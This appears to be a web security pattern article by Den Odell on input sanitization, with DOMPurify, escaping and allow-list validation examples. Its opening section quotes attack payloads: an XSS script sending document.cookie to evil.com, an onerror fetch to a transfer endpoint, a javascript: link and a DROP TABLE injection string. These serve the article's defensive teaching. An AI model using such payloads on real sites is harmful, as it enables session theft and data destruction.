Skip to main content
Saved
Pattern
Difficulty Advanced

Input Sanitization

Clean and validate user-provided data before rendering or processing to prevent injection attacks.

Den Odell
By Den Odell Added

Input Sanitization

Problem

A user sets their display name to <script>document.location='https://evil.com/steal?c='+document.cookie</script>. Your profile page drops that string into innerHTML, and now every visitor who views the profile has their session cookie shipped off to an attacker’s server. This is stored XSS, and it is one of the most damaging bugs you can ship because the payload lives in your database and fires automatically for every viewer. You did not have to make a mistake on the victim’s page; you made it once on the page that saved the name.

The attack surface is wider than raw <script> tags. A comment of <img src=x onerror="fetch('/api/transfer?to=attacker')"> runs JavaScript the moment the broken image fails to load. A profile bio with <a href="javascript:steal()">click me</a> turns an innocent-looking link into code execution. Event handler attributes like onclick, onload, and onmouseover smuggle scripts past anyone who only filters for the word “script,” and SVG, <iframe>, and <object> elements each carry their own execution vectors. Attackers iterate faster than any deny-list of “known bad” strings can keep up.

Injection is not limited to the browser, either. The same untrusted name that breaks your page can break your database when it flows unescaped into a query as '; DROP TABLE users;--, and unclosed or deeply nested tags can corrupt your layout or hang the renderer. The common thread is trust: you accepted data from someone you do not control and handed it to an interpreter (the HTML parser, the SQL engine) that happily executes whatever it is given.

Solution

Build allow-lists, not deny-lists. Decide what you will permit and reject everything else, because enumerating every dangerous pattern is a losing game against attackers who only need to find one you missed. A username allow-list of [a-zA-Z0-9_-] is short, auditable, and immune to the next clever encoding trick.

For plain text, the cheapest and safest move is to never parse it as HTML at all. Setting textContent (or rendering through your framework’s default text binding) makes the browser treat input as literal characters, so <script> shows up on screen as the five visible characters rather than executing. When you genuinely need a string of escaped HTML, convert the dangerous characters yourself: < becomes &lt;, > becomes &gt;, & becomes &amp;, " becomes &quot;, and ' becomes &#x27;.

When the feature actually requires rich text (a comment editor, a markdown preview), reach for a maintained sanitizer like DOMPurify rather than a hand-rolled regex. DOMPurify parses the input into a DOM, walks it against an allow-list of safe tags and attributes, strips dangerous elements (<script>, <iframe>, <object>) and handlers (onerror, onclick, javascript: URLs), and returns markup you can trust. Regex-based HTML filtering is notoriously easy to bypass; do not write your own.

Sanitize at the boundary where untrusted data enters, validate formats against schemas or precise patterns, and parameterize every database query instead of concatenating strings. Layer Content Security Policy headers on top as defense-in-depth: a strict CSP that forbids inline scripts can neutralize an XSS payload even if a sanitization bug slips through. No single control is sufficient on its own, which is exactly why you stack them.

Example

These examples sanitize untrusted HTML before rendering it. The approach is genuinely per-framework because each one has a different escape hatch for injecting raw HTML, so each needs its own guard.

Sanitizing Rich Text Before Rendering

import DOMPurify from 'dompurify';

function Comment({ html }) {
  // Sanitize untrusted HTML, then opt in to raw rendering.
  const clean = DOMPurify.sanitize(html, {
    ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a', 'p', 'ul', 'ol', 'li'],
    ALLOWED_ATTR: ['href']
  });

  return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}

Escaping HTML Without a Library

When you only need plain text rendered safely, let the browser do the escaping for you. Assigning to textContent and reading back innerHTML converts every dangerous character into its entity, with no parsing of the input as markup:

function escapeHTML(input) {
  const el = document.createElement('div');
  // textContent treats input as literal text, escaping < > & " automatically.
  el.textContent = input;
  return el.innerHTML;
}

escapeHTML('<img src=x onerror=alert(1)>');
// => "&lt;img src=x onerror=alert(1)&gt;"  (inert text, never executes)

Validating Formats With an Allow-List

Reject malformed input at the boundary instead of trying to clean it. Match against a tight pattern of permitted characters and refuse anything outside it:

const RULES = {
  username: /^[a-zA-Z0-9_-]{3,20}$/,
  email: /^[^\s@]+@[^\s@]+\.[^\s@]+$/
};

function validate(field, value) {
  const pattern = RULES[field];
  if (!pattern || !pattern.test(value)) {
    throw new Error(`Invalid ${field}`);
  }
  return value;
}

validate('username', 'jane_doe-42');         // ok
validate('username', '<script>alert(1)</script>'); // throws: Invalid username

Benefits

  • Neutralizes stored and reflected XSS by turning malicious markup into inert text before it ever reaches the HTML parser.
  • Allow-lists stay robust as attackers invent new payloads, because you define what is permitted rather than chasing what is forbidden.
  • A maintained sanitizer like DOMPurify covers obscure vectors (SVG, mutation XSS, javascript: URLs) that hand-rolled filters miss.
  • Format validation at the boundary stops bad data early, preventing both security holes and downstream display bugs.
  • Parameterized queries close off SQL injection while keeping the database layer simple and readable.
  • Pairs naturally with output encoding and a strict Content Security Policy for layered, defense-in-depth protection.
  • Sanitizing once at the entry point lets the rest of the application treat the data as trusted, reducing scattered, error-prone checks.

Tradeoffs

  • Sanitization that is too aggressive strips legitimate content, frustrating users who see their formatting or special characters silently removed.
  • Allow-lists need maintenance; a tag or attribute you forgot to permit results in support tickets when valid input gets rejected.
  • Rich-text sanitization is genuinely hard, and rolling your own with regex is a near-guaranteed bypass. You are taking a dependency on a library you must keep updated.
  • Mutation XSS and parser quirks mean even good sanitizers ship security patches, so pinning an old version of DOMPurify is itself a risk.
  • Sanitization is not encoding. Cleaned data still needs context-appropriate output encoding for HTML attributes, URLs, and JavaScript contexts.
  • Running sanitization on the client only protects the client; untrusted data must also be validated and sanitized on the server, since attackers can skip your UI entirely.
  • Visibly modifying user input after submission (trimming, stripping tags) can confuse people who do not understand why their text changed.
  • Treating data as “safe forever” after one pass is dangerous if it later flows into a different context, such as a query, a shell command, or an email header.
  • Heavy sanitization of large documents adds measurable parsing cost, which matters for high-throughput rendering or server-side workloads.

Summary

Input sanitization defends against injection by cleaning untrusted data at the boundary, favoring allow-lists over deny-lists, escaping HTML entities for plain text, and delegating rich-text cleaning to a maintained sanitizer like DOMPurify rather than a regex. Treat it as one layer among several: combine it with format validation, parameterized queries, output encoding, and a strict Content Security Policy, and always enforce the same checks on the server, never the client alone.

Newsletter

A Monthly Email
from Den Odell

Behind-the-scenes thinking on frontend patterns, site updates, and more

No spam. Unsubscribe anytime.